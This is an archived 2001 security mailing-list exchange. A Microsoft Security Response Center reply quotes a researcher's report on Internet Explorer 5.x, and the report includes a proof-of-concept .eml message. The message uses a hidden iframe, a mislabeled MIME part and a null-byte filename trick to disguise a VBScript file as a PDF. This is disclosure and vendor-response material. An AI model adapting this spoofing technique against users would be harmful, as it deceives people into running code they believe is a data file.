-----BEGIN PGP SIGNED MESSAGE----- Hi Jesus - I'm afraid the situation may not be what you believe. First, your system is not patched, despite what the dialogue says. The dialogue is displayed if you try to install the patch on anything other than IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1, and the text of the dialogue is incorrect. This error has been present in several recent IE patches, and we're working to ensure that it's not present in future ones. Meantime, here's the passage from the bulletin that discusses it: -------- start ---------- Caveats: If the patch is installed on a system running a version of IE other than the one it is designed for, an error message will be displayed saying that the patch is not needed. This message is incorrect, and customers who see this message should upgrade to a supported version of IE and re-install the patches. -------- end ---------- We checked the code you provided below, and have verified that the behavior you're seeing is not a vulnerability. Although you're right that it's possible for a web site to initiate a file download, this is by-design behavior and is unrelated to the vulnerability discussed in MS01-020. A Q&A in the FAQ discusses the situation: -------- start ---------- I heard that even after applying this patch, an e-mail could start a file download automatically. Is this true? Yes. However, this is not related to this vulnerability, and doesn't pose a security risk. It's always possible for an e-mail to start a file download, and of course the author of the mail can give the file a name that sounds innocuous. However, the file download cannot actually begin unless and until the user selects a location to which it should be downloaded, and clicks the OK button. As a general rule, it is probably worth questioning the trustworthiness of any e-mail that automatically starts a file download. The best action is to simply click the Cancel button in the dialogue. -------- end ---------- Hope that helps explain the situation. Regards, Scott Culp Security Program Manager Microsoft Security Response Center - -----Original Message----- From: Jesús López de Aguileta [mailto:[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> ] Sent: Monday, April 02, 2001 1:12 PM To: [EMAIL PROTECTED] Subject: User may be fooled to execute programs browsing with IE5.1 Hi, Playing with Cuartango´s recently exploit (http://www.kriptopolis.com/cua/eml.html <http://www.kriptopolis.com/cua/eml.html> ) I've found that it´s possible to trick an user to execute one file making he/she think it's a data file of any kind (pdf, mpeg,...). This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not tested). I have already downloaded the MS01-20 patch in the systems tested but both appears to be not vulnerable to Cuartango's exploit (msgbox: "This update does not need to be installed on your system"), probably because both have updated Media Player 7 installed. I think this is a completely different issue and excuse me if it's previously solved/commented. Detail: - --------8<----cut here-------8< From: "Ripped from Juan Carlos Garcia Cuartango" Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal - --1 Content-Type: multipart/alternative; boundary="2" - --2 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff > <iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe> Done<br> </BODY> </HTML> - --2-- - --1 Content-Type: application/x-shockwave-flash; name="hola.vbs" Content-Transfer-Encoding: quoted-printable Content-ID: <donthurtme.pdf> msgbox("Hello") - --1 - --------8<--cut here---------8< Making an .eml file with the above content and browsing it with IE 5, displays a window for download or online browse the "FILE" (not program) "donthurtme.pdf". If the user choose to online browse it, the VBscript code execute. Another interesting issue is that, when replacing: mime 1 part with: - --1 Content-Type: application/xxxx; name="hola.pdf%00.vbs" Content-Transfer-Encoding: quoted-printable Content-ID: <donthurtme.pdf> msgbox("Hello") - --1 IE truncate in the popup window the name displaying "hola.pdf" instead of "hola.pdf%00.vbs", making the user thinks that the extension of the program is different. Notice that in this second case, IE properly ask for "Run this PROGRAM" or "Save this PROGRAM", only the extension may confuse the user. Regards and excuse my poor English. Jesus Lopez de Aguileta -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.3 iQEVAwUBOskH840ZSRQxA/UrAQFesgf+MMmynejaNFC7Vk3I8yedqxsurHo1AKas NzaGboFlIUJZF3qIQ/8eOb0ygHIXvRtoUx5fIxEkfuqJP2pWobenvGk+kOsu+4Hf EtvkOOu3a4afnREosy/HozPTIEVKxWrMR0+yvnlniq8TFaoHeHIBjNRQ/O7fJ6D0 Iu9VB6p3OyhfKMfq/F9PbPwnzprwEue8A3BCrF1RqCoeumFzCCm79pi908S3cRny a+LBPTmygyYWopwV8TGnpNBGNBEJ1PPVhdezYLgl881FjXdWPmSYEf/88oUddhmq t/950JyJEFYzncKI4iazuOEdd4wSel7mi2XiXM50sxpdrhXiO8K5BA== =f1TY -----END PGP SIGNATURE-----
Re: User may be fooled to execute programs browsing with IE5.1
Microsoft Security Response Center Tue, 03 Apr 2001 12:47:12 -0700
- User may be fooled to execute programs ... Jesús López de Aguileta
- Re: User may be fooled to execute ... Microsoft Security Response Center
- Re: User may be fooled to exec... Jesús López de Aguileta
- Re: User may be fooled to exec... Jesús López de Aguileta
- Re: User may be fooled to ... Thomas Roessler
- Re: User may be fooled to exec... Gary Flynn